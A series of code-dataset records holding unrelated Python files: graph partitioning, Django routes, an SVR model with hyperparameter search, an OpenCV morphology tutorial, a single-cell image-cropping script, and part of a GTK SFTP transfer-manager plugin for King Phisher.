(Handler.edgeConectivity(G,p1,partitionArray[r])>=Handler.edgeConectivity(G,p2,partitionArray[r]))&(Handler.edgeConectivity(G,p1,partitionArray[r])>=Handler.edgeConectivity(G,p3,partitionArray[r])):\r\n p1.append(partitionArray[r])\r\n del partitionArray[r]\r\n elif (Handler.edgeConectivity(G,p2,partitionArray[r])>=Handler.edgeConectivity(G,p1,partitionArray[r]))&(Handler.edgeConectivity(G,p2,partitionArray[r])>=Handler.edgeConectivity(G,p3,partitionArray[r])):\r\n p2.append(partitionArray[r])\r\n del partitionArray[r]\r\n elif (Handler.edgeConectivity(G,p3,partitionArray[r])>=Handler.edgeConectivity(G,p1,partitionArray[r]))&(Handler.edgeConectivity(G,p3,partitionArray[r])>=Handler.edgeConectivity(G,p2,partitionArray[r])):\r\n p2.append(partitionArray[r])\r\n del partitionArray[r]\r\n counter-=1\r\n print(len(partitionArray))\r\n if(cond):\r\n break\r\npart.append(p1)\r\npart.append(p2)\r\npart.append(p3)\r\n'''\r\npartition = []\r\nfor p in part:\r\n partTemp = []\r\n for par in p:\r\n for part in par:\r\n partTemp.append(part)\r\n partition.append(partTemp)\r\nfor z in partition:\r\n h = G.subgraph(z)\r\n edgeWeight = 0\r\n for (u, v, d) in h.edges(data=True):\r\n edgeWeight += abs(d['weight'])\r\n print(edgeWeight)\r\nnp.savetxt('test_4.txt', partition,fmt='%r')\r\n\r\n\"\"\"\r\n\r\npos=nx.spring_layout(G)\r\n# edges\r\nnx.draw_networkx_edges(G,pos,\r\n width=1)\r\n# labels\r\nnx.draw_networkx_labels(G,pos,font_size=2,font_family='sans-serif')\r\n\r\nnx.draw_networkx_nodes(G,pos,node_size=1)\r\nplt.show()\r\n\r\n\r\n#show partitioning nodes\r\n\r\nfor i in partition:\r\n\r\n \r\n nx.draw_networkx_nodes(G,pos,nodelist=i,node_size=1)\r\n nx.draw_networkx_labels(G,pos,font_size=2,font_family='sans-serif')\r\n nx.draw_networkx_edges(G,pos,nodelist = i,\r\n width=1)\r\n \r\n \r\n plt.show()\r\n\r\n\"\"\"\r\n\r\n","repo_name":"HADLakmal/Advanced_Alpha_cut","sub_path":"graph_random.py","file_name":"graph_random.py","file_ext":"py","file_size_in_byte":9264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19479332350","text":"from django.urls import path,re_path\nfrom .views import *\n\nurlpatterns = [\n path('login/',login),\n path('logout/',logout),\n path('register/',register),\n path('tables/', tables),\n path('index/', index),\n path('about/', about),\n path('goods_add/', goods_add),\n path('get_code/', get_code),\n re_path('tables/(?P\\d+)/(?P\\d+)/', tables),\n re_path('tables/(?P\\d+)/(?P\\w+)/', goods_status),\n\n]\n","repo_name":"ltt1997/Djingo1118","sub_path":"Qshop/Sheller/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38389747170","text":"from utility.module import *\r\nfrom utility.constant import *\r\nfrom utility.setting import *\r\nimport utility.gloabl_values as g\r\n\r\nfrom machine_learning.tools.metrics import *\r\nfrom machine_learning.model.base_model import *\r\n\r\nclass MySupportVectorRegression(BaseMyModel):\r\n def __init__(self, i, svr_kernel_name) -> None:\r\n super().__init__(i)\r\n self.name = svr_kernel_name\r\n self.gsr_flg = False\r\n self.bayse_flg = False \r\n\r\n def fit(self, x, y):\r\n if self.gsr_flg:\r\n print(self.gsr.best_params_)\r\n self.mdl = svm.SVR(**self.gsr.best_params_)\r\n elif self.bayse_flg:\r\n self.mdl = svm.SVR(**self.best_params)\r\n else:\r\n self.mdl = svm.SVR()\r\n self.mdl.fit(x, y)\r\n self.x_train_var = np.var(x)\r\n\r\n def bayse_search(self, x, y):\r\n base_param = {\r\n 'kernel': search_params[self.name]['kernel'][0]\r\n }\r\n searcher = BayseSearch(x, y, base_param)\r\n self.best_params = searcher.fit()\r\n self.bayse_flg = True\r\n \r\n def grid_search(self, x, y):\r\n kf = KFold(n_splits=n_split)\r\n self.gsr = GridSearchCV(\r\n svm.SVR(),\r\n search_params[self.name],\r\n scoring=make_scorer(RMSE, greater_is_better=False),\r\n return_train_score=True,\r\n n_jobs=-1,\r\n cv = kf,\r\n verbose=3\r\n )\r\n self.gsr.fit(x, y)\r\n self.gsr_flg = True\r\n\r\n def set_parameter(self):\r\n self.sv = np.array(self.mdl.support_vectors_)\r\n self.n_sv = len(self.sv)\r\n self.coef = self.mdl.dual_coef_[0]\r\n self.ic = self.mdl.intercept_[0]\r\n self.gamma = 1 / (g.n_feature * self.x_train_var)\r\n self.degree = self.mdl.degree\r\n self.coef0 = self.mdl.coef0\r\n\r\n def set_parameter_for_opt(self, s):\r\n if g.select_ml == SVRLINEAR:\r\n calced_list = []\r\n for i in range(self.n_sv):\r\n sum_value = 0\r\n for j in range(g.n_environment_s):\r\n s_total_index = j + g.n_user_available_x\r\n sum_value += s[j] * self.sv[i][s_total_index]\r\n calced_list.append(sum_value)\r\n self.ic_by_kernel = calced_list\r\n\r\n def predict(self, x):\r\n return self.mdl.predict(x)\r\n\r\n def predict_manual(self, x):\r\n kernel_value = []\r\n if self.name == SVRLINEAR:\r\n for i in range(self.n_sv):\r\n sum_value = 0\r\n for j in range(len(x)):\r\n sum_value += x[j] * self.sv[i][j]\r\n kernel_value.append(sum_value)\r\n elif self.name == SVRPOLY:\r\n for i in range(self.n_sv):\r\n sum_value = 0\r\n for j in range(len(x)):\r\n sum_value += x[j] * self.sv[i][j]\r\n sum_value *= self.gamma\r\n sum_value += self.coef0\r\n sum_value = sum_value ** self.degree\r\n kernel_value.append(sum_value)\r\n elif self.name == SVRGAUSS:\r\n for i in range(self.n_sv):\r\n exp_value = 0\r\n for j in range(len(x)):\r\n exp_value += (x[j] - self.sv[i][j]) ** 2\r\n kernel_value.append(np.exp(-self.gamma * (exp_value)))\r\n ans = np.sum(np.array([self.coef[i] * kernel_value[i] for i in range(self.n_sv)])) + self.ic\r\n return ans\r\n\r\n\r\nclass BayseSearch():\r\n def __init__(self, data_train, label_train, base_param):\r\n self.data_train = data_train\r\n self.label_train = label_train\r\n self.base_param = base_param\r\n\r\n def objective(self, trial):\r\n params = {\r\n 'C': trial.suggest_float('C', 0, 3),\r\n 'epsilon': trial.suggest_float('epsilon', 0, 3)\r\n }\r\n if g.select_ml == SVRPOLY:\r\n params['degree'] = trial.suggest_int('degree', 2, 10)\r\n\r\n params.update(self.base_param)\r\n \r\n model = svm.SVR(**params)\r\n kf = KFold(n_splits=n_split, shuffle=True, random_state=g.seed)\r\n scores = cross_validate(model, X=self.data_train, y=self.label_train, scoring=make_scorer(RMSE), cv=kf)\r\n print(f\"val score:{scores['test_score'].mean()}\")\r\n return scores['test_score'].mean()\r\n\r\n def fit(self):\r\n study = optuna.create_study(direction='minimize',sampler=optuna.samplers.TPESampler(seed=g.seed))\r\n study.optimize(self.objective, n_trials=n_trial)\r\n\r\n best_params = study.best_params\r\n \r\n params = self.base_param\r\n params.update(best_params)\r\n print(study.best_value)\r\n return params\r\n\r\n\r\nsearch_params = {}\r\nsearch_params[SVRLINEAR] = {\r\n 'kernel':[\"linear\"],\r\n 'C' : [0.1, 0.5, 1],#正則化パラメーター。正則化の強さはCに反比例します。厳密に正でなければなりません。ペナルティは、l2ペナルティの2乗です。\r\n 'epsilon': [0.1, 0.25, 0.5, 0.75, 1],#イプシロン-SVRモデルのイプシロン。これは、トレーニング損失関数でペナルティが実際の値からイプシロンの距離内で予測されたポイントに関連付けられていないイプシロンチューブを指定します。\r\n}\r\nsearch_params[SVRPOLY] = {\r\n 'kernel':[\"poly\"],\r\n 'degree':[2, 3, 4, 5],\r\n 'C' : [0.5, 1, 3, 5],#正則化パラメーター。正則化の強さはCに反比例します。厳密に正でなければなりません。ペナルティは、l2ペナルティの2乗です。\r\n 'epsilon': [0.1, 0.5, 1, 3],#イプシロン-SVRモデルのイプシロン。これは、トレーニング損失関数でペナルティが実際の値からイプシロンの距離内で予測されたポイントに関連付けられていないイプシロンチューブを指定します。\r\n}\r\nsearch_params[SVRGAUSS] = {\r\n 'kernel':[\"rbf\"],\r\n 'degree':[1], \r\n 'C' : [0.1, 0.5, 1, 2, 3, 4, 5],#正則化パラメーター。正則化の強さはCに反比例します。厳密に正でなければなりません。ペナルティは、l2ペナルティの2乗です。\r\n 'epsilon': [0, 0.1, 0.5, 1, 2, 3],#イプシロン-SVRモデルのイプシロン。これは、トレーニング損失関数でペナルティが実際の値からイプシロンの距離内で予測されたポイントに関連付けられていないイプシロンチューブを指定します。\r\n}\r\n","repo_name":"tokyotech-nakatalab/ApproximateFrankWolfe","sub_path":"machine_learning/model/supportvector_regression.py","file_name":"supportvector_regression.py","file_ext":"py","file_size_in_byte":6456,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71666604968","text":"###############################################################################\n# Morfolojik İşlemler\n###############################################################################\n\nimport argparse\nimport cv2\n\n\"\"\"\nkodun bulduğu kaynak dosyasına girip oradan ,\n-->python dosyaİsmi.py --image(key) resimİsmi.png(value)\n\nyapabilirsiniz.\n\"\"\"\n\n\n\nap=argparse.ArgumentParser()\nap.add_argument(\"-i\",\"--image\",required=True,help=\"path to the input image\")\nargs=vars(ap.parse_args())\n\n\n### ERODE ### \n\nimage = cv2.imread(args[\"image\"])\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ncv2.imshow(\"Original\", image)\n#Uygulanan erode işleminin resimdeki değişimi\nfor i in range(0, 3):\n\teroded = cv2.erode(gray.copy(), None, iterations=i + 1) #ilk parametre uygulanacak resim, ikinci parametremiz structing element, (None kullanırsanız : 8 tane komşusuna bakıp-(4'lü olanı da vardır. Opsiyonel olarak kendi structing element'inizi kullanabilirsiniz), 3×3'lük bir kernel matrisi kullanılacaktır.)\n #Son parametremiz ise kaç defa uygulanacağıdır.\n\tcv2.imshow(\"Erode işlemi {} defa uygulandi\".format(i + 1), eroded)\n\tcv2.waitKey(0)\n\n\n### DILATION ### \n\ncv2.destroyAllWindows()\ncv2.imshow(\"Original\", image)\n\n\n# Uygulanan dilation işleminin resimdeki değişimi\nfor i in range(0, 3):\n\tdilated = cv2.dilate(gray.copy(), None, iterations=i + 1) #ilk parametre uygulanacak resim, ikinci parametremiz structing element, (None kullanırsanız : 8 tane komşusuna bakıp-(4'lü olanı da vardır. Opsiyonel olarak kendi structing element'inizi kullanabilirsiniz), 3×3'lük bir kernel matrisi kullanılacaktır.)\n #Son parametremiz ise kaç defa uygulanacağıdır.\n\tcv2.imshow(\"Erode işlemi {} defa uygulandi\".format(i + 1), dilated)\n\tcv2.waitKey(0)\n\n\n### OPENING ### \n\n\ncv2.destroyAllWindows()\ncv2.imshow(\"Original\", image)\nkernelSizes = [(3, 3), (5, 5), (7, 7)] #Structing_Element yükseklik ve genişliğini belirtir.\n# Her kernel'in etkisini görmek için:\nfor kernelSize in kernelSizes:\n\t#Kendime bir structing_element oluşturdum.\n\tkernel = cv2.getStructuringElement(cv2.MORPH_RECT, kernelSize) #Fonksiyonumuz iki argümanı kabul eder, birincisi structing_elements'in türü. İkincisi ise boyutlarıdır.\n #Şayet görüntünü çarpraz bir görüntüden oluşuyorsa : cv2.MORPH_CROSS\n #Yuvarlak bir görüntü için kullanıyorsanız : cv2.MORPH_ELLIPSE gibi tercihler yapabilirsiniz\n\n \n\topening = cv2.morphologyEx(gray, cv2.MORPH_OPEN, kernel)\n\tcv2.imshow(\"Opening: ({}, {})\".format(kernelSize[0], kernelSize[1]), opening)\n\tcv2.waitKey(0)\n\n#Daha önceden belirttiğimiz gibi karıncalı resimlerde, nesneyi öne çıkarmak isterseniz gayet kullanışlı bir işlemdir.\n\n\n### CLOSING ### \n\ncv2.destroyAllWindows()\ncv2.imshow(\"Original\", image)\n# # Her kernel'in etkisini görmek için:\nfor kernelSize in kernelSizes:\n\t# \n\tkernel = cv2.getStructuringElement(cv2.MORPH_RECT, kernelSize)\n\tclosing = cv2.morphologyEx(gray, cv2.MORPH_CLOSE, kernel)\n\tcv2.imshow(\"Closing: ({}, {})\".format(\n\t\tkernelSize[0], kernelSize[1]), closing)\n\tcv2.waitKey(0)\n\n#Adından da anlaşılacağı gibi, nesnelerin içindeki delikleri kapatmak veya bileşenleri birbirine bağlamak için bir kapatma kullanılır.\n\n\n### Morfolojik Gradyan ### \ncv2.destroyAllWindows()\ncv2.imshow(\"Original\", image)\n\nfor kernelSize in kernelSizes:\n\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, kernelSize)\n\n gradient = cv2.morphologyEx(gray, cv2.MORPH_GRADIENT, kernel)\n\n gradient=cv2.resize(gradient,(480,480))\n\n cv2.imshow(\"Gradient: ({}, {})\".format(kernelSize[0], kernelSize[1]), gradient)\n\n cv2.waitKey(0)\n\n#Morfolojik gradyan, bir görüntünün genişlemesi ile erozyona uğraması arasındaki farktır.Bu sayede görüntünün kenarlarının bulunmasını sağlayabiliriz\n\n\n\n","repo_name":"Yusuf-Cizlasmak/OpenCv_with_Python","sub_path":"Goruntude_Temel_islemler/MorfolojikIslemler.py","file_name":"MorfolojikIslemler.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10265974749","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Find single cell images based on UMAP coordinates\n\n# ## Import libraries\n\n# In[1]:\n\n\nimport pathlib\nimport pandas as pd\nfrom PIL import Image\nimport cv2\nimport os\nimport numpy as np\nimport tifffile as tf\nimport yaml\nimport pprint\n\n\n# ## Set variables and paths\n\n# In[2]:\n\n\n# Load in UMAP + metadata for each single cell as data frame\nUMAP_plate3_df = pd.read_csv(\n pathlib.Path(\"./results/UMAP_localhost230405150001_sc_feature_selected.tsv.gz\"), sep=\"\\t\"\n)\nprint(UMAP_plate3_df.shape)\n\n# Images directory for plate 3\nimages_dir = pathlib.Path(\n \"../../../1.preprocessing_data/Corrected_Images/localhost230405150001/\"\n).resolve(strict=True)\n\n# Output dir for composite and cropped images\noutput_img_dir = pathlib.Path(\"./images\")\noutput_img_dir.mkdir(exist_ok=True)\n\n# Output dirs \ncomp_dir = pathlib.Path(\"./images/composite_imgs\")\ncomp_dir.mkdir(exist_ok=True)\ncrop_dir = pathlib.Path(\"./images/cropped_imgs\")\ncrop_dir.mkdir(exist_ok=True)\n\n# CSV file path to store the data\ncsv_file_path = \"random_rows_for_UMAP.csv\"\n\n# Check if the CSV file already exists\nif os.path.isfile(csv_file_path):\n # Load the existing CSV into a DataFrame\n df = pd.read_csv(csv_file_path)\nelse:\n # Create a new DataFrame if the CSV doesn't exist\n df = pd.DataFrame(\n columns=[\n \"Metadata_cell_type\",\n \"Metadata_treatment\",\n \"Metadata_Plate\",\n \"Metadata_Well\",\n \"Metadata_Site\",\n \"Metadata_Cells_Location_Center_X\",\n \"Metadata_Cells_Location_Center_Y\",\n \"UMAP0\",\n \"UMAP1\",\n ]\n )\n\n\n# ## Read in `yaml` file with settings for each single cell type\n# \n# There is a `yaml` file called *image_settings.yaml* that holds the dictionary for all of the different UMAP single cells that we want to crop.\n\n# In[3]:\n\n\n# load in plate information\ndictionary_path = pathlib.Path(\"./image_settings.yaml\")\nwith open(dictionary_path) as file:\n cell_info_dictionary = yaml.load(file, Loader=yaml.FullLoader)\n\n# view the dictionary to assess that all info is added correctly\npprint.pprint(cell_info_dictionary, indent=4)\n\n\n# ## Find single cells from each cell type and treatment from UMAP (plate 3)\n\n# In[4]:\n\n\nfor crop_cell, info in cell_info_dictionary.items():\n # Define your filter conditions\n condition = (\n (UMAP_plate3_df['Metadata_cell_type'] == crop_cell.split('-')[0]) &\n (UMAP_plate3_df['Metadata_treatment'] == crop_cell.split('-')[1]) &\n (UMAP_plate3_df['UMAP0'].between(info[\"UMAP0\"][0], info[\"UMAP0\"][1]) &\n (UMAP_plate3_df['UMAP1'].between(info[\"UMAP1\"][0], info[\"UMAP1\"][1]))\n ))\n\n # Apply the filter\n filtered_df = UMAP_plate3_df[condition]\n\n # Apply the filter\n filtered_df = UMAP_plate3_df[condition]\n\n # Select and display only the specific columns\n selected_columns = [\n 'Metadata_cell_type',\n 'Metadata_treatment',\n 'Metadata_Plate',\n 'Metadata_Well',\n 'Metadata_Site',\n 'Metadata_Cells_Location_Center_X',\n 'Metadata_Cells_Location_Center_Y',\n 'UMAP0',\n 'UMAP1'\n ]\n\n filtered_df = filtered_df[selected_columns]\n\n # Randomly select a row\n random_row = filtered_df.sample(n=1, random_state=info[\"Random state\"]) \n\n # Add the selected row to the DataFrame\n df = df.append(random_row, ignore_index=True)\n\n # Assign the direction to the UMAP_direction column for the last added row\n df.at[df.index[-1], \"UMAP_direction\"] = crop_cell.split('-')[2]\n\n # Drop any duplicate rows that occur when rerunning this code\n df.drop_duplicates(inplace=True)\n\n # Save the updated DataFrame to the CSV file\n df.to_csv(csv_file_path, index=False)\n\n # Create a filename based on Metadata_Plate, Metadata_Well, Metadata_Site\n plate = random_row['Metadata_Plate'].values[0]\n well = random_row['Metadata_Well'].values[0]\n site = random_row['Metadata_Site'].values[0]\n\n # Initialize a list to store file paths\n file_paths = []\n\n # Create 5 different file paths with \"d0\" through \"d4\" suffixes\n for i in range(5):\n filename = f\"{images_dir}/{plate}_{well}{site}d{i}_illumcorrect.tiff\"\n file_paths.append(filename)\n\n print(\"Randomly selected row:\")\n print(random_row)\n print(\"Generated filenames:\")\n for path in file_paths:\n print(path)\n\n # Initialize empty lists to store the images for each channel\n blue_channel = []\n green_channel = []\n red_channel = []\n\n # Iterate through channels from the random well/site and assign the correct file names with the color channel\n for file_path in file_paths:\n filename = pathlib.Path(file_path).name\n if 'd0' in filename:\n blue_channel_image = cv2.imread(str(file_path), cv2.IMREAD_UNCHANGED)\n blue_channel.append(blue_channel_image)\n elif 'd1' in filename:\n green_channel_image = cv2.imread(str(file_path), cv2.IMREAD_UNCHANGED)\n green_channel.append(green_channel_image)\n elif 'd4' in filename:\n red_channel_image = cv2.imread(str(file_path), cv2.IMREAD_UNCHANGED)\n red_channel.append(red_channel_image)\n\n # Stack the images for each channel along the channel axis\n blue_channel_stack = np.stack(blue_channel, axis=-1)\n green_channel_stack = np.stack(green_channel, axis=-1)\n red_channel_stack = np.stack(red_channel, axis=-1)\n\n # Scale the pixel values to fit within the 16-bit range (0-65535)\n blue_channel_stack = (blue_channel_stack / np.max(blue_channel_stack) * 65535).astype(np.uint16)\n green_channel_stack = (green_channel_stack / np.max(green_channel_stack) * 65535).astype(np.uint16)\n red_channel_stack = (red_channel_stack / np.max(red_channel_stack) * 65535).astype(np.uint16)\n\n # Create the RGB numpy array by merging the channels\n composite_image = cv2.merge((red_channel_stack, green_channel_stack, blue_channel_stack)).astype(np.uint16)\n\n # Path for saving comp images\n comp_path = pathlib.Path(f\"{comp_dir}/{info['composite_save_path']}\")\n\n # Save the composite 16-bit RGB tiff image\n tf.imwrite(comp_path, composite_image)\n\n # Load the composite image from the save path as an Image object instead of numpy array\n composite_image = Image.open(comp_path)\n\n # Assuming you have a DataFrame called \"filtered_df\" with center coordinates\n center_x = random_row[\"Metadata_Cells_Location_Center_X\"]\n center_y = random_row[\"Metadata_Cells_Location_Center_Y\"]\n\n # Define the size of the cropping box (250x250 pixels)\n box_size = 250\n\n # Paths for saving cropped images\n crop_path = pathlib.Path(f\"{crop_dir}/{info['crop_save_path']}\")\n\n # Iterate through the center coordinates and crop each cell\n for x, y in zip(center_x, center_y):\n left = x - box_size // 2\n top = y - box_size // 2\n right = x + box_size // 2\n bottom = y + box_size // 2\n\n # Crop the cell\n cell_image = composite_image.crop((left, top, right, bottom))\n\n # Save the cropped cell image with a unique name, you can use the cell's ID or index\n cell_image.save(crop_path)\n\n # Close the composite image\n composite_image.close()\n\n","repo_name":"WayScience/CFReT_data","sub_path":"4.analyze_data/notebooks/UMAP/nbconverted/2.find_sc.py","file_name":"2.find_sc.py","file_ext":"py","file_size_in_byte":7242,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5594440054","text":"import collections\nimport logging\nimport os\nimport stat\nimport threading\n\nfrom . import tasks\nfrom . import directory\nfrom . import sftp_utilities\nfrom . import editor\n\nfrom king_phisher.client import gui_utilities\nfrom king_phisher.client.widget import extras\n\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GdkPixbuf\nfrom gi.repository import GLib\n\nlogger = logging.getLogger('KingPhisher.Plugins.SFTPClient')\n\nclass StatusDisplay(object):\n\t\"\"\"\n\tClass representing the bottom treeview of the GUI. This contains the logging\n\tand graphical representation of all queued transfers.\n\t\"\"\"\n\tdef __init__(self, queue):\n\t\tself.queue = queue\n\t\tself.scroll = sftp_utilities.get_object('SFTPClient.notebook.page_stfp.scrolledwindow_transfer_statuses')\n\t\tself.treeview_transfer = sftp_utilities.get_object('SFTPClient.notebook.page_stfp.treeview_transfer_statuses')\n\t\tself._tv_lock = threading.RLock()\n\n\t\tcol_img = Gtk.CellRendererPixbuf()\n\t\tcol = Gtk.TreeViewColumn('')\n\t\tcol.pack_start(col_img, False)\n\t\tcol.add_attribute(col_img, 'pixbuf', 0)\n\t\tself.treeview_transfer.append_column(col)\n\t\tgui_utilities.gtk_treeview_set_column_titles(self.treeview_transfer, ('Local File', 'Remote File', 'Status'), column_offset=1)\n\n\t\tcol_bar = Gtk.TreeViewColumn('Progress')\n\t\tprogress = Gtk.CellRendererProgress()\n\t\tcol_bar.pack_start(progress, True)\n\t\tcol_bar.add_attribute(progress, 'value', 4)\n\t\tcol_bar.set_property('resizable', True)\n\t\tcol_bar.set_min_width(125)\n\t\tself.treeview_transfer.append_column(col_bar)\n\n\t\t# todo: make this a CellRendererBytes\n\t\tgui_utilities.gtk_treeview_set_column_titles(self.treeview_transfer, ('Size',), column_offset=5, renderers=(extras.CellRendererBytes(),))\n\t\tself._tv_model = Gtk.TreeStore(GdkPixbuf.Pixbuf, str, str, str, int, int, object)\n\t\tself.treeview_transfer.connect('size-allocate', self.signal_tv_size_allocate)\n\t\tself.treeview_transfer.connect('button_press_event', self.signal_tv_button_pressed)\n\n\t\tself.treeview_transfer.set_model(self._tv_model)\n\t\tself.treeview_transfer.show_all()\n\n\t\tself.popup_menu = Gtk.Menu.new()\n\n\t\tself.menu_item_paused = Gtk.CheckMenuItem.new_with_label('Paused')\n\t\tmenu_item = self.menu_item_paused\n\t\tmenu_item.connect('toggled', self.signal_menu_toggled_paused)\n\t\tself.popup_menu.append(menu_item)\n\n\t\tself.menu_item_cancel = Gtk.MenuItem.new_with_label('Cancel')\n\t\tmenu_item = self.menu_item_cancel\n\t\tmenu_item.connect('activate', self.signal_menu_activate_cancel)\n\t\tself.popup_menu.append(menu_item)\n\n\t\tmenu_item = Gtk.SeparatorMenuItem()\n\t\tself.popup_menu.append(menu_item)\n\n\t\tmenu_item = Gtk.MenuItem.new_with_label('Clear')\n\t\tmenu_item.connect('activate', self.signal_menu_activate_clear)\n\t\tself.popup_menu.append(menu_item)\n\t\tself.popup_menu.show_all()\n\n\tdef _get_selected_tasks(self):\n\t\ttreepaths = self._get_selected_treepaths()\n\t\tif treepaths is None:\n\t\t\treturn None\n\t\tselected_tasks = set()\n\t\tfor treepath in treepaths:\n\t\t\ttreeiter = self._tv_model.get_iter(treepath)\n\t\t\tselected_tasks.add(self._tv_model[treeiter][6])\n\t\t\tself._tv_model.foreach(lambda _, path, treeiter: selected_tasks.add(self._tv_model[treeiter][6]) if path.is_descendant(treepath) else 0)\n\t\treturn selected_tasks\n\n\tdef _get_selected_treepaths(self):\n\t\tselection = self.treeview_transfer.get_selection()\n\t\tmodel, treeiter = selection.get_selected()\n\t\tif treeiter is None:\n\t\t\treturn None\n\t\ttreepaths = []\n\t\ttreepaths.append(model.get_path(treeiter))\n\t\treturn treepaths\n\n\tdef _change_task_state(self, state_from, state_to):\n\t\tmodified_tasks = []\n\t\twith self.queue.mutex:\n\t\t\tselected_tasks = set([task for task in self._get_selected_tasks() if task.state in state_from])\n\t\t\tfor task in selected_tasks:\n\t\t\t\tmodified_tasks.append(task)\n\t\t\t\tmodified_tasks.extend(task.parents) # ensure parents are also synced because state changes may affect them\n\t\t\t\ttask.state = state_to\n\t\tself.sync_view(set(modified_tasks))\n\n\tdef _sync_view(self, sftp_tasks=None):\n\t\t# This value was set to True to prevent the treeview from freezing.\n\t\tif not self.queue.mutex.acquire(blocking=True):\n\t\t\treturn\n\t\tif not self._tv_lock.acquire(blocking=False):\n\t\t\tself.queue.mutex.release()\n\t\t\treturn\n\t\tsftp_tasks = (sftp_tasks or self.queue.queue)\n\t\tfor task in sftp_tasks:\n\t\t\tif not isinstance(task, tasks.TransferTask):\n\t\t\t\tcontinue\n\t\t\tif task.treerowref is None:\n\t\t\t\tparent_treeiter = None\n\t\t\t\tif task.parent:\n\t\t\t\t\tparent_treerowref = task.parent.treerowref\n\t\t\t\t\tif parent_treerowref is None:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tparent_treepath = parent_treerowref.get_path()\n\t\t\t\t\tif parent_treepath is None:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tparent_treeiter = self._tv_model.get_iter(parent_treepath)\n\t\t\t\tdirection = Gtk.STOCK_GO_FORWARD if task.transfer_direction == 'upload' else Gtk.STOCK_GO_BACK\n\t\t\t\timage = self.treeview_transfer.render_icon(direction, Gtk.IconSize.BUTTON, None) if parent_treeiter is None else Gtk.Image()\n\t\t\t\ttreeiter = self._tv_model.append(parent_treeiter, [\n\t\t\t\t\timage,\n\t\t\t\t\ttask.local_path,\n\t\t\t\t\ttask.remote_path,\n\t\t\t\t\ttask.state,\n\t\t\t\t\t0,\n\t\t\t\t\tNone if isinstance(task, tasks.TransferDirectoryTask) else task.size,\n\t\t\t\t\ttask\n\t\t\t\t])\n\t\t\t\ttask.treerowref = Gtk.TreeRowReference.new(self._tv_model, self._tv_model.get_path(treeiter))\n\t\t\telif task.treerowref.valid():\n\t\t\t\trow = self._tv_model[task.treerowref.get_path()] # pylint: disable=unsubscriptable-object\n\t\t\t\trow[3] = task.state\n\t\t\t\trow[4] = task.progress\n\t\tself.queue.mutex.release()\n\t\treturn False\n\n\tdef sync_view(self, sftp_tasks=None):\n\t\tif isinstance(sftp_tasks, tasks.Task):\n\t\t\tsftp_tasks = (sftp_tasks,)\n\t\tGLib.idle_add(self._sync_view, sftp_tasks, priority=GLib.PRIORITY_DEFAULT_IDLE)\n\n\tdef signal_menu_activate_clear(self, _):\n\t\twith self.queue.mutex:\n\t\t\tfor task in list(self.queue.queue):\n\t\t\t\tif not task.is_done:\n\t\t\t\t\tcontinue\n\t\t\t\tif task.treerowref is not None and task.treerowref.valid():\n\t\t\t\t\tself._tv_model.remove(self._tv_model.get_iter(task.treerowref.get_path()))\n\t\t\t\t\ttask.treerowref = None\n\t\t\t\tself.queue.queue.remove(task)\n\t\t\tself.queue.not_full.notify()\n\n\tdef signal_menu_toggled_paused(self, _):\n\t\tif self.menu_item_paused.get_active():\n\t\t\tself._change_task_state(('Active', 'Pending', 'Transferring'), 'Paused')\n\t\telse:\n\t\t\tself._change_task_state(('Paused',), 'Pending')\n\n\tdef signal_menu_activate_cancel(self, _):\n\t\tself._change_task_state(('Active', 'Paused', 'Pending', 'Transferring'), 'Cancelled')\n\n\tdef signal_tv_button_pressed(self, _, event):\n\t\tif event.button == Gdk.BUTTON_SECONDARY:\n\t\t\tselected_tasks = self._get_selected_tasks()\n\t\t\tif not selected_tasks:\n\t\t\t\tself.menu_item_cancel.set_sensitive(False)\n\t\t\t\tself.menu_item_paused.set_sensitive(False)\n\t\t\telse:\n\t\t\t\tself.menu_item_cancel.set_sensitive(True)\n\t\t\t\tself.menu_item_paused.set_sensitive(True)\n\t\t\t\ttasks_are_paused = [task.state == 'Paused' for task in selected_tasks]\n\t\t\t\tif any(tasks_are_paused):\n\t\t\t\t\tself.menu_item_paused.set_active(True)\n\t\t\t\t\tself.menu_item_paused.set_inconsistent(not all(tasks_are_paused))\n\t\t\t\telse:\n\t\t\t\t\tself.menu_item_paused.set_active(False)\n\t\t\t\t\tself.menu_item_paused.set_inconsistent(False)\n\t\t\tself.popup_menu.popup(None, None, None, None, event.button, Gtk.get_current_event_time())\n\t\t\treturn True\n\t\treturn\n\n\tdef signal_tv_size_allocate(self, _, event, data=None):\n\t\tadj = self.scroll.get_vadjustment()\n\t\tadj.set_value(0)\n\nclass FileManager(object):\n\t\"\"\"\n\tFile manager that manages the Transfer Queue by adding new tasks and\n\thandling tasks put in, as well as handles communication between all the\n\tother classes.\n\t\"\"\"\n\tdef __init__(self, application, ssh, config):\n\t\tself.application = application\n\t\tself.config = config\n\t\tself.queue = tasks.TaskQueue()\n\t\tself._threads = []\n\t\tself._threads_max = 1\n\t\tself._threads_shutdown = threading.Event()\n\t\tfor _ in range(self._threads_max):\n\t\t\tthread = threading.Thread(target=self._thread_routine)\n\t\t\tthread.start()\n\t\t\tself._threads.append(thread)\n\t\tself.editor = None\n\t\tself.window = sftp_utilities.get_object('SFTPClient.window')\n\t\tself.notebook = sftp_utilities.get_object('SFTPClient.notebook')\n\t\tself.notebook.set_show_tabs(False)\n\t\tself.notebook.connect('switch-page', self.signal_change_page)\n\t\tself.editor_tab_save_button = sftp_utilities.get_object('SFTPClient.notebook.page_editor.toolbutton_save_html_file')\n\t\tself.editor_tab_save_button.set_sensitive(False)\n\t\tself.editor_tab_save_button.connect('clicked', self.signal_editor_save)\n\t\tself.status_display = StatusDisplay(self.queue)\n\t\tself.local = directory.LocalDirectory(self.application, config)\n\t\tself.remote = 